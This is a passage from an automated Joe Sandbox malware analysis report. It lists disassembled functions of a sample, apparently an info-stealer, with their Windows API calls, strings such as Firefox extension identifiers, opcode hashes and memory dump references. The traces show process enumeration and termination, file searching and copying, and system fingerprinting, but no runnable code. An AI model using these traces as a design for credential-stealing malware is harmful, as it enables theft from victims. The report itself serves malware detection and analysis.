                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                            • String ID: ^userContextId=4294967295$moz-extension+++
                                                            • API String ID: 998311485-3310892237
                                                            • Opcode ID: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                            • Instruction ID: 431312e06e4e118a9a68feb07ac8eaa96768a2afdec7ba1937323e72019175af
                                                            • Opcode Fuzzy Hash: c6d68fb0603da1e25a23b90469779a044771ff029b5026b29d5fc07adc8ee29f
                                                            • Instruction Fuzzy Hash: 19516575D11108AACB04FBB1DC52DED7338AF54314F40852EF81667191EE386B9ACBAA
                                                            Function 004194D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 004194EB
                                                              • Part of subcall function 00418D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0041951E,00000000), ref: 00418D5B
                                                              • Part of subcall function 00418D50: HeapAlloc.KERNEL32(00000000,?,?,0041951E,00000000), ref: 00418D62
                                                              • Part of subcall function 00418D50: wsprintfW.USER32 ref: 00418D78
                                                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 004195AB
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 004195C9
                                                            • CloseHandle.KERNEL32(00000000), ref: 004195D6
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$Heap$AllocCloseHandleOpenTerminatememsetwsprintf
                                                            • String ID:
                                                            • API String ID: 396451647-0
                                                            • Opcode ID: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                            • Instruction ID: faa3cbc47edc6d62fcde4c42a86d6f60d7c6cb9d9231cedff5acf80003c00c5b
                                                            • Opcode Fuzzy Hash: 10821a0a9b0e3e9f18d0c0a89dc9fb30756029c80415081bc58457899473f0be
                                                            • Instruction Fuzzy Hash: E3315C75E4020CAFDB14DFD0CD49BEDB7B9EB44300F10441AE506AA284DB78AE89CB56
                                                            Function 022E9737 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 022E9752
                                                              • Part of subcall function 022E8FB7: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,022E9785,00000000), ref: 022E8FC2
                                                              • Part of subcall function 022E8FB7: RtlAllocateHeap.NTDLL(00000000), ref: 022E8FC9
                                                              • Part of subcall function 022E8FB7: wsprintfW.USER32 ref: 022E8FDF
                                                            • OpenProcess.KERNEL32(00001001,00000000,?), ref: 022E9812
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 022E9830
                                                            • CloseHandle.KERNEL32(00000000), ref: 022E983D
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                                            • String ID:
                                                            • API String ID: 3729781310-0
                                                            • Opcode ID: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                            • Instruction ID: 1966fd507f57be01be1918eb8ca97169c2c0f1f91db8edbb69edd4c07ebe01c6
                                                            • Opcode Fuzzy Hash: 0de5cb3b84569db27d3217fbf1ad12f67d16f90c4b13aa02d8c22dae1f7b6e71
                                                            • Instruction Fuzzy Hash: 843148B5E10248AFDF14DFE0CC49BEDB779EB45300F904419E506AA288DB786A88DF52
                                                            Function 00418680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 004186CA
                                                            • Process32First.KERNEL32(?,00000128), ref: 004186DE
                                                            • Process32Next.KERNEL32(?,00000128), ref: 004186F3
                                                              • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                              • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                              • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                              • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                            • CloseHandle.KERNEL32(?), ref: 00418761
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                            • String ID:
                                                            • API String ID: 1066202413-0
                                                            • Opcode ID: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                            • Instruction ID: 8f5abf7c5654a811b9b3f094c7d3948ba22bca0c3321aba4e2188e2e86b1b5ea
                                                            • Opcode Fuzzy Hash: 653c6250bfa2d25ce81b68ad29b9700611fbfcd40e1672ae0763ab040719d4ec
                                                            • Instruction Fuzzy Hash: F7315E71902218ABCB24EF95DC45FEEB778EF45714F10419EF10AA21A0DF386A85CFA5
                                                            Function 022E88E7 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 022EA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022EA9EF
                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205B7), ref: 022E8931
                                                            • Process32First.KERNEL32(?,00000128), ref: 022E8945
                                                            • Process32Next.KERNEL32(?,00000128), ref: 022E895A
                                                              • Part of subcall function 022EAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022EAC2C
                                                              • Part of subcall function 022EAC17: lstrcpy.KERNEL32(00000000), ref: 022EAC6B
                                                              • Part of subcall function 022EAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022EAC79
                                                              • Part of subcall function 022EAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022EAB6C
                                                            • CloseHandle.KERNEL32(?), ref: 022E89C8
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                            • String ID:
                                                            • API String ID: 1066202413-0
                                                            • Opcode ID: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                            • Instruction ID: 2b16b41d357271d2a048d5525aa5b60bff6fcd18246f052aa8a17739eb6b0277
                                                            • Opcode Fuzzy Hash: 8b5492bb2172847200a0110b71b51f63116bc16bb71ede11aa5be0a2ca02365c
                                                            • Instruction Fuzzy Hash: 07318C71911318EBCF24DF94CD84FEEB379EB55700F504199A10AA22A4DB346E84CFA1
                                                            Function 00414F40 Relevance: 6.1, APIs: 4, Instructions: 70stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414F7A
                                                            • lstrcatA.KERNEL32(?,00421070), ref: 00414F97
                                                            • lstrcatA.KERNEL32(?,008760B0), ref: 00414FAB
                                                            • lstrcatA.KERNEL32(?,00421074), ref: 00414FBD
                                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                              • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                              • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                              • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                            • String ID:
                                                            • API String ID: 2667927680-0
                                                            • Opcode ID: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                            • Instruction ID: b2f553c39a7574946245b6cc91baeb706efbd34a5fe7bafabb54328a91102e52
                                                            • Opcode Fuzzy Hash: 2865ce5e19fc320e7bdf7344607122c15ce296a35d2d737d06258ac16b0412a0
                                                            • Instruction Fuzzy Hash: FA213DBAA402047BC714FBF0EC46FED333DAB55300F40455DB649920C1EE7896C88B96
                                                            Function 004187C0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E28,00000000,?), ref: 0041882F
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E28,00000000,?), ref: 00418836
                                                            • wsprintfA.USER32 ref: 00418850
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocProcesslstrcpywsprintf
                                                            • String ID: %dx%d
                                                            • API String ID: 2716131235-2206825331
                                                            • Opcode ID: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                                            • Instruction ID: e741bf7ca2fc1d65a497d39fe48fe123552d5275a0b8a8093fc8d321cf3eb0b5
                                                            • Opcode Fuzzy Hash: 124e357ede7c9a4ec2e38b5c0962ba134007384ad5c1c3eeb759acb43c381339
                                                            • Instruction Fuzzy Hash: 48217FB5A80208BFDB00DFD4DD49FAEBBB9FB49B00F104119F605A7280C779A900CBA5
                                                            Function 022E1A07 Relevance: 6.1, APIs: 4, Instructions: 53stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcessstrtok_s
                                                            • String ID:
                                                            • API String ID: 3407564107-0
                                                            • Opcode ID: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                            • Instruction ID: dada6b9641bc4c403908fecdb169cc63010fb239e5ee0ba82f92f2f6832552a2
                                                            • Opcode Fuzzy Hash: 23663e118dc1d9675e857bc575fa0cf4eec126624f33d54e6aec62cd9d365414
                                                            • Instruction Fuzzy Hash: A41149B4910209EFCF04DFE4D948AEDBB75FF04305F408469E80AA6250E7705B14DF65
                                                            Function 00417980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 004179B0
                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,00420E00,00000000,?), ref: 004179B7
                                                            • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 004179C4
                                                            • wsprintfA.USER32 ref: 004179F3
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocLocalProcessTimewsprintf
                                                            • String ID:
                                                            • API String ID: 1243822799-0
                                                            • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                            • Instruction ID: 87643aaeb61937c0b28f46190d625ee9f9fa63f6271d25fb840393839df263de
                                                            • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                            • Instruction Fuzzy Hash: 6D1139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF605A2280E3395940CBB5
                                                            Function 022E7BE7 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00420E00,00000000,?), ref: 022E7C17
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022E7C1E
                                                            • GetLocalTime.KERNEL32(?,?,?,?,?,00420E00,00000000,?), ref: 022E7C2B
                                                            • wsprintfA.USER32 ref: 022E7C5A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                            • String ID:
                                                            • API String ID: 377395780-0
                                                            • Opcode ID: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                            • Instruction ID: 7ab8456280568004345be6c728328476938821766eb4fb1773edd4f3bdf85d72
                                                            • Opcode Fuzzy Hash: d25a51ab8cf6fccfa60616151632c2f03c452b8beb60607c736287f9abe72aa2
                                                            • Instruction Fuzzy Hash: 101139B2944118ABCB14DFC9DD45BBEB7F9FB4DB11F10421AF606A2280D3795940CBB1
                                                            Function 022E7C97 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000), ref: 022E7CCA
                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 022E7CD1
                                                            • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0064A248,00000000,?,00420E10,00000000,?,00000000,00000000,?), ref: 022E7CE4
                                                            • wsprintfA.USER32 ref: 022E7D1E
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                                            • String ID:
                                                            • API String ID: 3317088062-0
                                                            • Opcode ID: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                            • Instruction ID: 51186470935b5ea7dc09d66f4cb3f123c7afd4d01f53faeeaab8c5fbe378d6ae
                                                            • Opcode Fuzzy Hash: b881c6b0ead1d296197200307cca27ecd4ed8ab0e7bcc50e28ea7705d7869b14
                                                            • Instruction Fuzzy Hash: 89115EB1A45218EFEB248B94DC49FA9B7B9FB05721F1043AAF51AA32C0D7745940CF51
                                                            Function 022E3880 Relevance: 6.0, APIs: 4, Instructions: 45stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: strtok_s
                                                            • String ID:
                                                            • API String ID: 3330995566-0
                                                            • Opcode ID: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                                            • Instruction ID: d592912b6ddba72c6b9ed82fcbad3204c0218892bf195751ca6e5ae09ca43e24
                                                            • Opcode Fuzzy Hash: 88ee3256d646c21cc813880afdb35c02c7abfa0159f377c054558803c8e079b0
                                                            • Instruction Fuzzy Hash: 161125B4E1020AEFCF14CFE6E848BEEB7B5BB44306F40C028E026A6254D7749500CF55
                                                            Function 022E9547 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileA.KERNEL32(022E3D55,80000000,00000003,00000000,00000003,00000080,00000000,?,022E3D55,?), ref: 022E9563
                                                            • GetFileSizeEx.KERNEL32(000000FF,022E3D55), ref: 022E9580
                                                            • CloseHandle.KERNEL32(000000FF), ref: 022E958E
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleSize
                                                            • String ID:
                                                            • API String ID: 1378416451-0
                                                            • Opcode ID: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                            • Instruction ID: abc0761735a47766ec3619e024c25d9cef0481d3881f699767b18d813af70466
                                                            • Opcode Fuzzy Hash: f462b5cb5e9955b16ef4a6797186c4cfbf9f6fe3abbcd1d27cc58421f490090d
                                                            • Instruction Fuzzy Hash: 78F04F39E50208BBDF20DFF0DC49B9E77BAEB49710F50C654FA12A7284D67596418B40
                                                            Function 022E6D5A Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022E6D31
                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 022E6D4F
                                                            • CloseHandle.KERNEL32(00000000), ref: 022E6D60
                                                            • Sleep.KERNEL32(00001770), ref: 022E6D6B
                                                            • CloseHandle.KERNEL32(?,00000000,?,0064A540,?,0042110C,?,00000000,?,00421110,?,00000000,00420AEF), ref: 022E6D81
                                                            • ExitProcess.KERNEL32 ref: 022E6D89
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3069504910.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_22d0000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                            • String ID:
                                                            • API String ID: 941982115-0
                                                            • Opcode ID: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                                            • Instruction ID: f691de4af503793782dbe8b2146c289a26ed7da5ca3b9e2e3c53031138073a1c
                                                            • Opcode Fuzzy Hash: 5d3735d569cffe7bbea000e7acfc03b16a2d4300877d619867e3aa12521868c8
                                                            • Instruction Fuzzy Hash: DDF05E78960306AEEF10ABE1DC09BBD767AEB25751FD01518F503A51D4CBB05100DA66
                                                            Function 00406D40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 157COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID:
                                                            • String ID: `o@
                                                            • API String ID: 0-590292170
                                                            • Opcode ID: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                                            • Instruction ID: c65cc5113f4fbf7636557f8b1f026e9f2285814709fd8c8344c4410f81c0aea8
                                                            • Opcode Fuzzy Hash: 7ad59576bd09cc7eceacd48e5d7f84764234e902501c4ca3efc067249123903a
                                                            • Instruction Fuzzy Hash: A66138B4900219EFCB14DF94E944BEEB7B1BB04304F1185AAE40A77380D739AEA4DF95
                                                            Function 00414BB0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 118stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                                            • lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00414BEA
                                                            • lstrcatA.KERNEL32(?,00879B78), ref: 00414C08
                                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                                              • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                                              • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                                              • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                                              • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                                              • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00876020,?,000003E8), ref: 00414A4A
                                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                                              • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                                              • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                                              • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                                              • Part of subcall function 00414910: wsprintfA.USER32 ref: 00414A07
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_400000_A865.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: lstrcat$Filewsprintf$Find$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                                            • String ID: UaA
                                                            • API String ID: 2104210347-3893042857
                                                            • Opcode ID: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                                            • Instruction ID: 5a37e5a53a2562059c730f6b0b3ae842953eee94398a2728108a858f2c1bafc2
                                                            • Opcode Fuzzy Hash: 8ba6efb70901ca5478d437239848c433a21302fddde02a53de9488f6e8c4bcee
                                                            • Instruction Fuzzy Hash: 9341C5BA6001047BD754FBB0EC42EEE337DA785700F40851DB54A96186EE795BC88BA6
                                                            Function 00418B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                            • GetSystemTime.KERNEL32(?,00845370,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.3068887934.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000002.00000002.3068887934.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.3068887934.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
